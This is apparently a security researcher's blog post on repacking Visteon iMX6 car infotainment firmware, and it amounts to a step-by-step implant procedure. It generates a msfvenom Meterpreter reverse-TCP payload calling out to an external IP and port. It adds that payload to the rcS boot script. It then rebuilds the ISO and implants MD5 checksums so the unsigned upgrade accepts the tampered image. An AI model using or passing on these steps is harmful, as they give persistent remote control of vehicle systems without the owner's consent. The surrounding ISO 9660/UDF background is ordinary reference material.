Visteon Firmware Repacking

Friday, November 30, 2018 🌐中文

Preface

The firmware layout is illustrated below. It is organized into three directories—APP, SOC, and MCU—which correspond roughly to the Application Layer, the Core Board, and the Base Board, respectively.

  • APP: Contains updates for navigation maps and voice-recognition libraries.
  • MCU: Contains firmware updates for the MCU, covering both the base board and the instrument cluster.
  • SOC: Contains system updates for the core board.

Additionally, version.txt is used for version validation. Reverse-engineering the upgrade utility revealed no cryptographic signature verification; however, a simple ISO modification caused the upgrade to fail—which prompted this investigation.

file_tree

Upgrade Process

On Visteon’s iMX6 platform, a specific “recovery partition” handles system upgrades.

First, the U-Boot configuration is modified to boot directly from partition 2 on the next restart. This is done by writing to the boot_config file to switch the boot partition.

echo 2 > /sys/devices/soc0/soc.0/2100000.aips-bus/2198000.usdhc/mmc_host/mmc2/mmc2:0001/boot_config

Upon rebooting into the recovery environment, the script formats and mounts the original system partition.

mkfs.ext3 -F /dev/mmcblk2p2
mount -t ext3 -o rw /dev/mmcblk2p2 /tmp/mmcblk2p12

Next, the ISO image is mounted:

/bin/mount -t iso9660 -o exec,loop /tmp/mnt/8644_8005_3BFD62ABB2EC3783_0/upgrade-ring.iso /tmp/isofs

Finally, the rootfs archive is extracted to the target partition:

tar xvf /tmp/isofs/rootfs.tar -C /tmp/mmcblk2p12

Repacking rootfs

First, I generated an ARM Little Endian (ARMLE) reverse TCP payload:

$ msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=206.189.68.130 LPORT=54444 -f elf -o linux_armle.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 260 bytes
Final size of elf file: 344 bytes
Saved as: linux_armle.elf

Next, I configured it to execute at boot time:

echo "/bin/linux_armle.elf &" >> ./etc/init.d/rcS

Note: When repacking the rootfs, do not preserve file permissions (e.g., do not use the -p flag with tar), as doing so may cause boot failures on this specific system.

tar -cf ../rootfs.tar ./*

ISO-9660

ISO 9660 is the standard file system for CD-ROM media. Joliet is an extension to ISO 9660 that relaxes some of its restrictions (such as filename length). The standard defines three interchange levels:

  • Level 1: DOS-compatible (8.3 filenames).
  • Level 2: Supports longer filenames but limits single files to 2 GB.
  • Level 3: Supports single files larger than 2 GB (up to 8 TB).

UDF

UDF (Universal Disk Format) utilizes packet writing, allowing optical media (like CD-RWs) to be treated more like hard drives. It supports files larger than 2 GB natively, but its compatibility with older systems is generally lower than that of ISO 9660.

ISO MD5

iso_hex

To detect data corruption, the ISO header contains MD5 checksums. Standard tools like UltraISO do not generate these checksums when repacking, causing the upgrade validation to fail.

First, I examined the metadata of the original ISO. It identified the format as ISO 9660 Joliet Level 3.

$ isoinfo -d -i upgrade-ring.raw.iso
CD-ROM is in ISO 9660 format
System id: LINUX
Volume id: CDROM
Volume set id:
Publisher id:
Data preparer id:
Application id: GENISOIMAGE ISO 9660/HFS FILESYSTEM CREATOR (C) 1993 E.YOUNGDALE (C) 1997-2006 J.PEARSON/J.SCHILLING (C) 2006-2007 CDRKIT TEAM
Copyright File id:
Abstract File id:
Bibliographic File id:
Volume set size is: 1
Volume set sequence number is: 1
Logical block size is: 2048
Volume size is: 488066
Joliet with UCS level 3 found
Rock Ridge signatures version 1 found

I used mkisofs to repack the directory into an ISO image:

mkisofs -h
...
-J, -joliet 生成Joliet目录信息
-T, -translation-table 支持长文件名
...

mkisofs -J -T -v -o upgrade-ring.iso iso/

After building the ISO, I used implantisomd5 to embed the MD5 checksums, which satisfied the upgrade program’s validation check.

$ implantisomd5 upgrade-ring.iso
Inserting md5sum into iso image...
md5 = e1914b1bf902a63244e3bb810823e6b2
Inserting fragment md5sums into iso image...
fragmd5 = 5126d7bcb6459898d56ca8822c5e7bdd45b15d5a9ed6c1f7351a55d18ae8
frags = 20
Setting supported flag to 0

Finally, verify the image integrity:

$ checkisomd5 upgrade-ring.iso
upgrade-ring.raw.iso:   e1914b1bf902a63244e3bb810823e6b2
Fragment sums: 5126d7bcb6459898d56ca8822c5e7bdd45b15d5a9ed6c1f7351a55d18ae8
Fragment count: 20
Supported ISO: no
Press [Esc] to abort check.
Checking: 100.0%

The media check is complete, the result is: PASS.

It is OK to use this media.
Automotive SecurityVisteoniMX6ISO
Table of Contents

Firmware Extraction Series - Raw NAND File Recovery

TinyScheme File I/O